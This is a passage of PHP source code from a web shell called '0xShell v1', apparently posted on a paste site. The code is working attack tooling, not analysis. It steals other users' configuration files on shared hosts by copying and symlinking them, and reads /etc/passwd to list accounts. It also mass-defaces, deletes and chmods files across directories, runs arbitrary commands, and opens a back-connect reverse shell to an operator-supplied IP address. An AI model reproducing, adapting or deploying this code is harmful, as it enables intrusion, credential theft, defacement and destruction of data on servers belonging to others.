  1694. "/home/$user_cox/public_html/cart/includes/iso4217.php" => "Hostbills",
  1695. "/home/$user_cox/public_html/order/includes/iso4217.php" => "Hostbills",
  1696. "/home/$user_cox/public_html/client/includes/iso4217.php" => "Hostbills",
  1697. "/home/$user_cox/public_html/clients/includes/iso4217.php" => "Hostbills",
  1698. "/home/$user_cox/public_html/cliente/includes/iso4217.php" => "Hostbills",
  1699. "/home/$user_cox/public_html/clientes/includes/iso4217.php" => "Hostbills",
  1700. "/home/$user_cox/public_html/billing/includes/iso4217.php" => "Hostbills",
  1701. "/home/$user_cox/public_html/billings/includes/iso4217.php" => "Hostbills",
  1702. "/home/$user_cox/public_html/my/includes/iso4217.php" => "Hostbills",
  1703. "/home/$user_cox/public_html/secure/includes/iso4217.php" => "Hostbills",
  1704. "/home/$user_cox/public_html/support/order/includes/iso4217.php" => "Hostbills"
  1705. );  
  1706.  
  1707. foreach($grab_config as $config => $nama_config) {
  1708.     if($_POST['tipe'] == 'grab') {
  1709. $ambil_config = file_get_contents($config);
  1710. if($ambil_config == '') {
  1711. } else {
  1712. $file_config = fopen("0xgrab/$user_cox-$nama_config.txt","w");
  1713. fputs($file_config,$ambil_config);
  1714. }
  1715. }
  1716. if($_POST['tipe'] == 'grabsym') {
  1717. @symlink($config,"0xsym/".$user_cox."-".$nama_config.".txt");
  1718. }
  1719. if($_POST['tipe'] == 'grabsym404') {
  1720. $sym404=symlink($config,"0xsym404/".$user_cox."-".$nama_config.".txt");
  1721. if($sym404){
  1722.     @mkdir("0xsym404/".$user_cox."-".$nama_config.".txt404", 0777);
  1723.     $xsym404="Options Indexes FollowSymLinks
  1724. DirectoryIndex jancox.htm
  1725. HeaderName 0x.txt
  1726. Satisfy Any
  1727. IndexOptions IgnoreCase FancyIndexing FoldersFirst NameWidth=* DescriptionWidth=* SuppressHTMLPreamble
  1728. IndexIgnore *
  1729. IndexStyleSheet 'https://0x1999.github.io/0xShell/style/melex.css'";
  1730.  
  1731. @file_put_contents("0xsym404/".$user_cox."-".$nama_config.".txt404/.htaccess",$xsym404);
  1732.  
  1733. @symlink($config,"0xsym404/".$user_cox."-".$nama_config.".txt404/0x.txt");
  1734.  
  1735.     }
  1736.  
  1737. }
  1738.  
  1739.                     }    
  1740.         }  if($_POST['tipe'] == 'grab') {
  1741.             echo "<center><a href='?dir=$dir/0xgrab'><font color=lime>Done</font></a></center>";
  1742.         }
  1743.     if($_POST['tipe'] == 'grabsym404') {
  1744.         echo "<center>
  1745. <a href=\"0xsym404/root/\">Root Server</a>
  1746. <br><a href=\"0xsym404/\">Configurations</a></center>";
  1747.     }
  1748.      if($_POST['tipe'] == 'grabsym') {
  1749. echo "<center>
  1750. <a href=\"0xsym/root/\">Root Server</a>
  1751. <br><a href=\"0xsym/\">Configurations</a></center>";
  1752.             }if($_POST['tipe'] == 'grabsymv') {
  1753. echo "<center>
  1754. <a href=\"0xsymv/root/\">Root Server</a>
  1755. <br><a href=\"0xsymv/\">Configurations</a></center>";
  1756.             }
  1757.        
  1758.        
  1759.         }else{
  1760.         echo "<form method=\"post\" action=\"\"><center>
  1761.        <select class=\"select\" name=\"tipe\"  style=\"width: 450px;\" height=\"10\">
  1762.        <option value=\"grab\">Config Grab</option>
  1763.        <option value=\"grabsym\">Symlink Config</option>
  1764.         <option value=\"grabsym404\">Symlink Config 404</option>
  1765.         <option value=\"grabsymv\">VHosts Symlink Config</option>
  1766.         </center></select>
  1767.         <br>\n";
  1768.         if(!$etcpasswd){
  1769.             echo "<textarea name=\"passwd\" class='area' rows='15' cols='60'>\n";
  1770.         for($uid=0;$uid<60000;$uid++){
  1771. $ara = posix_getpwuid($uid);
  1772. if (!empty($ara)) {
  1773. while (list ($key, $val) = each($ara)){
  1774. print "$val:";
  1775. }
  1776. print "\n";
  1777. }
  1778. }
  1779.         echo "</textarea><br><input type=\"submit\" value=\"GassPoll\"></td></tr></center>\n";
  1780.     } else {
  1781.         echo "<textarea name=\"passwd\" class='area' rows='15' cols='60'>\n";
  1782.         echo $etcpasswd;
  1783.         echo "</textarea><br><input type=\"submit\" value=\"GassPoll\"></td></tr></center>\n";
  1784.  
  1785.     }
  1786.     }
  1787.  
  1788.  
  1789. }
  1790. elseif(isset($_GET['do']) && ($_GET['do'] == 'cekjum')) {
  1791.   echo '<form method="post" action="" style="float: left;">
  1792.    Dir :
  1793.    <input size="30" name="cekjum" height="10" type="text"><input name="submit" value=">>" type="submit">
  1794.    </form><br><br>';
  1795.     if ($_POST){
  1796.       echo cekjum($_REQUEST['cekjum']);
  1797.     } else {
  1798.       echo cekjum($_GET['cekjum']);
  1799.     }
  1800. }
  1801. elseif(isset($_GET['do']) && ($_GET['do'] == 'jump')) {
  1802.     $i = 0;
  1803.     echo "<pre><div class='margin: 5px auto;'>";
  1804.     $etc = fopen("/etc/passwd", "r");
  1805.    
  1806.     while($passwd = fgets($etc)) {
  1807.         if($passwd == '' || !$etc) {
  1808.             echo "<font color=red>Can't read /etc/passwd</font>";
  1809.         } else {
  1810.  
  1811.             preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  1812.             foreach($user_jumping[1] as $userjum) {
  1813.                 $userjumdir = "/home/$userjum/public_html";
  1814.                 $perm = permissions($userjumdir);
  1815.                 $perm = w($userjumdir,$perm);
  1816.  
  1817.                 if(is_readable($userjumdir)) {
  1818.                     $i++;
  1819.                     $jrw = "<a>[<font color=lime>R</font>]  [$perm] </a><a href='?dir=$userjumdir'><font color=gold>$userjumdir</font></a> <a href='?do=cekjum&cekjum=$userjumdir' target='_blank'>Check</a><br>";
  1820.                     if(is_writable($userjumdir)) {
  1821.                     $jrw = "<a>[<font color=lime>RW</font>] [$perm] </a><a href='?dir=$userjumdir'><font color=gold>$userjumdir</font></a> <a href='?do=cekjum&cekjum=$userjumdir' target='_blank'>Check</a><br>";
  1822.                     }
  1823.                     echo $jrw;
  1824.                 }
  1825.             }
  1826.         }
  1827.     }
  1828.     if($i == 0) {
  1829.     } else {
  1830.         echo "<br>Total ada ".$i." Kimcil di ".gethostbyname($_SERVER['HTTP_HOST'])."";
  1831.     }
  1832.     echo "</div></pre>";
  1833. }
  1834.     elseif(isset($_GET['do']) && ($_GET['do'] == 'mass_deface')) {
  1835.     echo "<center><form action=\"\" method=\"post\">\n";
  1836.     $dirr=$_POST['d_dir'];
  1837.     $index = $_POST["script"];
  1838.     $index = str_replace('"',"'",$index);
  1839.     $index = stripslashes($index);
  1840.     function edit_file($file,$index){
  1841.         if (is_writable($file)) {
  1842.         clear_fill($file,$index);
  1843.         echo "<Span style='color:green;'><strong> [+] Nyabun 100% Successfull </strong></span><br></center>";
  1844.         }
  1845.         else {
  1846.             echo "<Span style='color:red;'><strong> [-] Ternyata Tidak Boleh Menyabun Disini :( </strong></span><br></center>";
  1847.             }
  1848.             }
  1849.     function hapus_massal($dir,$namafile) {
  1850.         if(is_writable($dir)) {
  1851.             $dira = scandir($dir);
  1852.             foreach($dira as $dirb) {
  1853.                 $dirc = "$dir/$dirb";
  1854.                 $lokasi = $dirc.'/'.$namafile;
  1855.                 if($dirb === '.') {
  1856.                     if(file_exists("$dir/$namafile")) {
  1857.                         unlink("$dir/$namafile");
  1858.                     }
  1859.                 } elseif($dirb === '..') {
  1860.                     if(file_exists("".dirname($dir)."/$namafile")) {
  1861.                         unlink("".dirname($dir)."/$namafile");
  1862.                     }
  1863.                 } else {
  1864.                     if(is_dir($dirc)) {
  1865.                         if(is_writable($dirc)) {
  1866.                             if(file_exists($lokasi)) {
  1867.                                 echo "[<font color=lime>DELETED</font>] $lokasi<br>";
  1868.                                 unlink($lokasi);
  1869.                                 $idx = hapus_massal($dirc,$namafile);
  1870.                             }
  1871.                         }
  1872.                     }
  1873.                 }
  1874.             }
  1875.         }
  1876.     }
  1877.     function clear_fill($file,$index){
  1878.         if(file_exists($file)){
  1879.             $handle = fopen($file,'w');
  1880.             fwrite($handle,'');
  1881.             fwrite($handle,$index);
  1882.             fclose($handle);  } }
  1883.  
  1884.     function gass(){
  1885.         global $dirr , $index ;
  1886.         chdir($dirr);
  1887.         $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  1888.         $files = scandir($dirr) ;
  1889.         $notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..",".");
  1890.         sort($files);
  1891.         $n = 0 ;
  1892.         foreach ($files as $file){
  1893.             if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) {
  1894.                 echo "<center><Span style='color: #8A8A8A;'><strong>$dirr/</span>$file</strong> ====> ";
  1895.                 edit_file($file,$index);
  1896.                 flush();
  1897.                 $n = $n +1 ;
  1898.                 }
  1899.                 }
  1900.                 echo "<br>";
  1901.                 echo "<center><br><h3>$n Kali Anda Telah Ngecrot  Disini </h3></center><br>";
  1902.                     }
  1903.     function ListFiles($dirrall) {
  1904.  
  1905.     if($dh = opendir($dirrall)) {
  1906.  
  1907.        $files = Array();
  1908.        $inner_files = Array();
  1909.        $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  1910.        $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db");
  1911.         while($file = readdir($dh)) {
  1912.             if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) {
  1913.                 if(is_dir($dirrall . "/" . $file)) {
  1914.                     $inner_files = ListFiles($dirrall . "/" . $file);
  1915.                     if(is_array($inner_files)) $files = array_merge($files, $inner_files);
  1916.                 } else {
  1917.                     array_push($files, $dirrall . "/" . $file);
  1918.                 }
  1919.             }
  1920.             }
  1921.  
  1922.             closedir($dh);
  1923.             return $files;
  1924.         }
  1925.     }
  1926.     function gass_all(){
  1927.         global $index ;
  1928.         $dirrall=$_POST['d_dir'];
  1929.         foreach (ListFiles($dirrall) as $key=>$file){
  1930.             $file = str_replace('//',"/",$file);
  1931.             echo "<center><strong>$file</strong> ===>";
  1932.             edit_file($file,$index);
  1933.             flush();
  1934.         }
  1935.         $key = $key+1;
  1936.     echo "<center><br><h3>$key Kali Anda Telah Ngecrot  Disini  </h3></center><br>"; }
  1937.     function chmod_all(){
  1938.         $chmod=$_POST['chmod'];
  1939.         $dirrall=$_POST['d_dir'];
  1940.         foreach (ListFiles($dirrall) as $key=>$file){
  1941.             $file = str_replace('//',"/",$file);
  1942.             echo "<center><strong>$file</strong> ===>";
  1943.             chmod($file,$chmod);
  1944.             flush();
  1945.         }
  1946.         $key = $key+1;
  1947.     echo "<center><br><h3>$key telah ngentu chmod disini</h3></center><br>"; }
  1948.     function sabun_massal($dir,$namafile,$isi_script) {
  1949.         if(is_writable($dir)) {
  1950.             $dira = scandir($dir);
  1951.             foreach($dira as $dirb) {
  1952.                 $dirc = "$dir/$dirb";
  1953.                 $lokasi = $dirc.'/'.$namafile;
  1954.                 if($dirb === '.') {
  1955.                     file_put_contents($lokasi, $isi_script);
  1956.                 } elseif($dirb === '..') {
  1957.                     file_put_contents($lokasi, $isi_script);
  1958.                 } else {
  1959.                     if(is_dir($dirc)) {
  1960.                         if(is_writable($dirc)) {
  1961.                             echo "[<font color=lime>DONE</font>] $lokasi<br>";
  1962.                             file_put_contents($lokasi, $isi_script);
  1963.                             $idx = sabun_massal($dirc,$namafile,$isi_script);
  1964.                         }
  1965.                     }
  1966.                 }
  1967.             }
  1968.         }
  1969.     }
  1970.     if($_POST['mass'] == 'onedir') {
  1971.         echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:red;' name='index' rows='10' cols='67'>\n";
  1972.         $ini="http://";
  1973.         $mainpath=$_POST[d_dir];
  1974.         $file=$_POST[d_file];
  1975.         $dir=opendir("$mainpath");
  1976.         $code=base64_encode($_POST[script]);
  1977.         $indx=base64_decode($code);
  1978.         while($row=readdir($dir)){
  1979.         $start=@fopen("$row/$file","w+");
  1980.         $finish=@fwrite($start,$indx);
  1981.         if ($finish){
  1982.             echo"$ini$row/$file\n";
  1983.             }
  1984.         }
  1985.         echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\n";
  1986.         $mainpath=$_POST[d_dir];$file=$_POST[d_file];
  1987.         $dir=opendir("$mainpath");
  1988.         $code=base64_encode($_POST[script]);
  1989.         $indx=base64_decode($code);
  1990.         while($row=readdir($dir)){$start=@fopen("$row/$file","w+");
  1991.         $finish=@fwrite($start,$indx);
  1992.         if ($finish){echo '<a href="http://' . $row . '/' . $file . '" target="_blank">http://' . $row . '/' . $file . '</a><br>'; }
  1993.         }
  1994.  
  1995.     }
  1996.     elseif($_POST['mass'] == 'sabunkabeh') { gass(); }
  1997.     elseif($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); }
  1998.     elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); }
  1999.     elseif($_POST['mass'] == 'chmodkabeh') { chmod_all(); }
  2000.     elseif($_POST['mass'] == 'massdeface') {
  2001.         echo "<div style='margin: 5px auto; padding: 5px'>";
  2002.         sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  2003.         echo "</div>";  }
  2004.     else {
  2005.         echo "
  2006.        <center><font style='text-decoration: underline;'>
  2007.        Select Type:<br>
  2008.        </font>
  2009.        <select class=\"select\" name=\"mass\"  style=\"width: 450px;\" height=\"10\">
  2010.        <option value=\"onedir\">Mass Deface 1 Dir</option>
  2011.        <option value=\"massdeface\">Mass Deface ALL Dir</option>
  2012.        <option value=\"sabunkabeh\">Sabun Massal Di Tempat</option>
  2013.        <option value=\"sabunmematikan\">Sabun Massal Bunuh Diri</option>
  2014.        <option value=\"chmodkabeh\">Chmod Massal</option>
  2015.        <option value=\"hapusmassal\">Mass Delete Files</option></center></select><br>
  2016.        <font style='text-decoration: underline;'>Folder:</font><br>
  2017.        <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  2018.        <font style='text-decoration: underline;'>Filename:</font><br>
  2019.        <input type='text' name='d_file' value='0x.php' style='width: 450px;' height='10'><br>
  2020.        <font style='text-decoration: underline;'>Index File:</font><br>
  2021.        <textarea name='script' style='width: 450px; height: 200px;'>Hacked By 0x1999</textarea><br>
  2022.        <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  2023.        </form></center>";
  2024.         }
  2025.     }
  2026. elseif(isset($_GET['do']) && ($_GET['do'] == 'bc')){   
  2027.     echo '
  2028.  <div id="back">
  2029.            <h2>Back Connect</h2>
  2030.            <p>Back connect will allow you to enter system commands remotely.</p>
  2031.            <p>
  2032.            <table>
  2033.                 <form action="" method="post">
  2034.                 <tr ><td>IP Address: </td><td><input type="textbox" name="ip" style="border:1px solid #5C7296; color: #5C7296;background-color:#1d1d1d;font-size:13px;"></td></tr>
  2035.                 <tr ><td>Port: </td><td><input type="textbox" name="port" style="border:1px solid #5C7296; color: #5C7296;background-color:#1d1d1d;font-size:13px;"></td></tr>
  2036.                 <tr ><td><input type="submit" name="bind" value="Open Connection" style="border:1px solid #5C7296; color: #5C7296;background-color:#1d1d1d;font-size:13px;"></td></tr>
  2037.                 </form>
  2038.                 </table>';
  2039.         if(isset($_POST['bind']))
  2040.                     {
  2041.             echo "<p>Attempting Connection...</p>";
  2042.             $ip = $_POST['ip'];
  2043.             $port = $_POST['port'];
  2044.             $sockfd = fsockopen($ip , $port , $errno, $errstr );
  2045.             if($errno != 0){
  2046.               echo "<font color='red'>$errno : $errstr</font>";
  2047.             } else if (!$sockfd)  {
  2048.               $result = "<p>Unexpected error has occured, connection may have failed.</p>";
  2049.             } else {
  2050.               fputs ($sockfd ,"
  2051.                \n{################################################################}
  2052.                \n..:: 0xShell v1 - Coded By 0x1999 ::..
  2053.                \n
  2054.                \n=> Backconnect
  2055.                \n=> Back
  2056.                \n
  2057.                \n{################################################################}\n\n");
  2058.               $dir = shell_exec("pwd");
  2059.               $sysinfo = shell_exec("uname -a");
  2060.               $time = Shell_exec("time");
  2061.               $len = 1337;
  2062.               fputs($sockfd, "User ", $sysinfo, "connected @ ", $time, "\n\n");
  2063.               while(!feof($sockfd)){ $cmdPrompt = '[0x]#:> ';
  2064.               fputs ($sockfd , $cmdPrompt );
  2065.               $command= fgets($sockfd, $len);
  2066.               fputs($sockfd , "\n" . shell_exec($command) . "\n\n");
  2067.             }
  2068.             fclose($sockfd);
  2069.             }
  2070.           }
  2071.         echo "</p></div>";
  2072.  
  2073. }elseif(isset($_GET['act']) && ($_GET['act'] == 'edit')) {
  2074.  
  2075.         if(isset($_POST['save'])){
  2076.             $file = $_POST['saveas'];
  2077.             $content = magicboom($_POST['content']);
  2078.             if($filez = @fopen($file,"w")){
  2079.                 $time = date("d-M-Y H:i",time());
  2080.                 if(@fwrite($filez,$content)) $msg = "file saved <span class=\"gaya\">@</span> ".$time;
  2081.                 else $msg = "failed to save";
  2082.                 @fclose($filez);
  2083.             }
  2084.             else $msg = "permission denied";
  2085.         }
  2086.         if(!isset($file)) $file = $_GET['file'];
  2087.         if($filez = @fopen($file,"r")){
  2088.             $content = "";
  2089.             while(!feof($filez)){
  2090.                 $content .= htmlentities(str_replace("''","'",fgets($filez)));
  2091.             }
  2092.             @fclose($filez);
  2093.         }
  2094.     ?>
  2095.         <form action="" method="post">
  2096.             <table class="cmdbox">
  2097.                 <tr>
  2098.                     <td colspan="2">
  2099.                         <textarea class="output" name="content">
  2100. <?php echo $content; ?>
  2101. </textarea>
  2102.                         <tr>
  2103.                             <td colspan="2">Save as <input id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" /><input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" /> &nbsp;
  2104.                                 <?php echo $msg; ?>
  2105.                             </td>
  2106.                         </tr>
  2107.             </table>
  2108.         </form>
  2109.         <?php
  2110. }
  2111. elseif(isset($_GET['do']) && ($_GET['do'] == 'serverinfo')){
  2112.    
  2113.   $s_safemode = ini_get("safe_mode");
  2114.   if($s_safemode = TRUE){$s_safemode = "<span class='enabled'>[ON";}else{$s_safemode = "<span class='disabled'>[OFF"; }
  2115.   if(extension_loaded('curl')){$curls="<span class='enabled'>[ON]</span>";}else{$curls="<span class='disabled'>[OFF]</span>";}
  2116.     echo "Server Port: ".$_SERVER['SERVER_PORT']."<br /><br />HTTP Connection: ".$_SERVER['HTTP_CONNECTION']."<br /><br />Operating System: ".php_uname()."<br /><br />";
  2117.     if(get_magic_quotes_gpc()){echo "Magic Quotes: <span class='enabled'>[ENABLED]</span><br /><br />";}else{echo "Magic Quotes: <span class='disabled'>[DISABLED]</span><br /><br />";}
  2118.     echo "PHP Version: ".phpversion()."<br /><br />Safe Mode: ".$s_safemode."]</span><br /><br />Curl: ".$curls."<br /><br />Accept Encoding:  ".$_SERVER['HTTP_ACCEPT_ENCODING']."<br /><br />Admin: ".$_SERVER['SERVER_ADMIN']."<br /><br /><strong>Disabled Functions: </strong>";
  2119.     if(!empty($disabled)){
  2120.     foreach($disabled as $functionsdis){
  2121.         echo $functionsdis.", ";
  2122.     }
  2123.     }else{
  2124.         echo "none";
  2125.     }
  2126.     echo "<br /><br /><strong>/etc/passwd: </strong>";
  2127.     if(is_readable("/home/etc/passwd")){
  2128.         echo "<span style='color:green;'>Readable</span>";
  2129.     }else{
  2130.         echo "<span style='color:red;'>Unreadable</span>";
  2131.     }
  2132. }elseif(isset($_GET['do']) && ($_GET['do'] == 'cmd')) {
  2133.     if($_POST['do_cmd']) {
  2134.         echo "<textarea class='area' rows='15' cols='60'>".exe($_POST['cmd'])."</textarea>";
  2135.     }
  2136. }elseif(isset($_GET['do']) && ($_GET['do'] == 'about')){
  2137.    
  2138.     echo "
  2139.         <h4>Information</h4>
  2140.         <p>$shell_name v$shell_version Ngelu Edition - coded by 0x1999.</p>";
  2141.  
  2142.         ?>
  2143.             <ul>
  2144.                 <li>Appearance C6 Shell.</li>
  2145.                 <li>File Manager By IndoXploit.</li>
  2146.                 <li>Thanks.</li>
  2147.             </ul>
  2148.             <br /><br />
  2149.             <?php
  2150. }else{
  2151. function GetFileSize($file){
  2152.     if(!is_dir($file))
  2153.         return round(filesize($file) / 1024, 2) . " Kb";
  2154.     else
  2155.         return "Not Availible";
  2156. }
  2157.  
  2158. function LastModified($file){
  2159.         return date("F d Y g:i:s", filemtime("$file"));}
  2160.  
  2161. ////////////
  2162.  
  2163.     if(is_dir($dir) == true) {
  2164.         echo '<table  cellspacing="0" cellpadding="0"><tr><td class="TableHeader_Name"> FileName</td><td class="TableHeader">Filetype</a></td><td class="TableHeader">Size</td><td class="TableHeader">Permisions</td><td class="TableLast">Last Modified</td><td class="TableHeaderoptions"> Options</td></tr>';
  2165.         $scandir = scandir($dir);
  2166.         foreach($scandir as $dirx) {
  2167.             $dtype = @filetype("$dir/$dirx");
  2168.             $dtime = date("F d Y g:i:s", @filemtime("$dir/$dirx"));
  2169.             if(!is_dir("$dir/$dirx")) continue;
  2170.             if($dirx === '..') {
  2171.                 $href = dirname($dir);
  2172.             } elseif($dirx === '.') {
  2173.                 $href = $dir;
  2174.             } else {
  2175.                 $href = $dir.'/'.$dirx;
  2176.             }
  2177.             if($dirx == '.') {
  2178.                 $act_dir = "<span id=\"titik1\">
  2179.             <a href='?act=edit&dir=$dir&file=$dir/newfile.php'>newfile</a> | <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a></span>
  2180.             <form action=\"?act=newfolder&dir=$dir\" method=\"post\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  2181.  
  2182.             <input class=\"inputz\" style=\"width:130px;\" type=\"text\" name=\"newfolder\" placeholder=\"new_folder\" />
  2183.             <input class=\"inputzbut\" type=\"submit\" name=\"new_save_folder\" style=\"width:35px;\" value=\"Go !\" />
  2184.             </form>";
  2185.                 }
  2186.                 elseif($dirx == '..')
  2187.                 {
  2188.                     $act_dir="<span id=\"titik2\"><a href='?act=edit&dir=$dir&file=$dir/newfile.php'>newfile</a> | <a href=\"javascript:tukar('titik2','titik2_form');\">newfolder</a></span>
  2189.             <form action=\"?act=newfolder&dir=$dir\" method=\"post\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  2190.            
  2191.             <input class=\"inputz\" style=\"width:130px;\" type=\"text\" name=\"newfolder\" placeholder=\"new_folder\" />
  2192.             <input class=\"inputzbut\" type=\"submit\" name=\"new_save_folder\" style=\"width:35px;\" value=\"Go !\" />
  2193.             </form>";
  2194.                 }
  2195.                 else {
  2196.                 $act_dir = "<a href=\"javascript:tukar('".clearspace($dirx)."_link','".clearspace($dirx)."_form');\">rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
  2197.             }
  2198.             echo "<tr class='filetr'>";
  2199.             echo "<td class='td_home'><a id=\"".clearspace($dirx)."_link\"  href='?dir=".$href."'><img src=''>  $dirx</a>
  2200.  
  2201.  
  2202.  
  2203. <form method=\"post\" id=\"".clearspace($dirx)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  2204.             <input type=\"hidden\" name=\"oldname\" value=\"".$dirx."\" style=\"margin:0;padding:0;\" />
  2205.             <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"fol_rename\" value=\"".$dirx."\" />
  2206.             <input class=\"inputzbut\" type=\"submit\" name=\"dir_rename\" value=\"rename\" />
  2207.             <input class=\"inputzbut\" type=\"button\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($dirx)."_form','".clearspace($dirx)."_link');\" />
  2208.             </form>
  2209.  
  2210.  
  2211.  
  2212.  
  2213.             </td>
  2214.            
  2215.            
  2216.            
  2217.             ";
  2218.             echo "<td class='td_home'><center>$dtype</center></td>";
  2219.             echo "<td class='td_home'><center>-</center></th>";
  2220.             echo "<td class='td_home'><center>".w("$dir/$dirx",permissions("$dir/$dirx"))."</center></td>";
  2221.             echo "<td class='td_home'>$dtime</td>";
  2222.             echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  2223.         }
  2224.         echo "</tr>";
  2225.         foreach($scandir as $file) {
  2226.             $ftype = filetype("$dir/$file");
  2227.             $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  2228.             $size = filesize("$dir/$file")/1024;
  2229.             $size = round($size,3);
  2230.             if($size > 1024) {
  2231.                 $size = round($size/1024,2). 'MB';
  2232.             } else {
  2233.                 $size = $size. 'KB';
  2234.             }
  2235.             if(!is_file("$dir/$file")) continue;
  2236.             echo "<tr class='filetr'>";
  2237.             echo "<td class='td_home'>
  2238.            
  2239.            
  2240.            
  2241.             <a id=\"".clearspace($file)."_link\" href='?act=view&dir=$dir&file=$dir/$file'><img src=''>  $file</a>
  2242.        
  2243.     <form method=\"post\" id=\"".clearspace($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  2244.         <input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
  2245.         <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"rename\" value=\"".$file."\" />
  2246.         <input type=\"submit\" name=\"do_rename\" value=\"rename\" />
  2247.         <input class=\"inputzbut\" type=\"button\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_form','".clearspace($file)."_link');\" />
  2248.     </form>
  2249.            
  2250.            
  2251.            
  2252.             ";
  2253.             echo "<td class='td_home'><center>$ftype</center></td>";
  2254.             echo "<td class='td_home'><center>$size</center></td>";
  2255.             echo "<td class='td_home'><center>".w("$dir/$file",permissions("$dir/$file"))."</center></td>";
  2256.             echo "<td class='td_home'>$ftime</td>";
  2257.             echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form');\">rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
  2258.         }
  2259.         echo "</tr></table>";
  2260.     } else {
  2261.         echo "<font color=red>can't open directory</font>";
  2262.     }
  2263.    
  2264.  
  2265.        
  2266.     ?></table>
  2267.                 <div style="background:#282828;border-bottom-right-radius:4px;-moz-border-bottom-right-radius:4px;-webkit-border-bottom-right-radius:4px;border-bottom-left-radius:4px;-moz-border-bottom-left-radius:4px;-webkit-border-bottom-left-radius:4px;height:25px;margin:0px 0px 10px 0px;width:1000px;">
  2268.                     <center>
  2269.                         Copyright © 2017 - 0x1999 </div>
  2270.  
  2271.                 <?php
  2272.    
  2273. }
  2274. @ob_flush();       
  2275. ?>
  2276.  
  2277.                 </body>
  2278.  
  2279.     </html>
Add Comment
Please, Sign In to add comment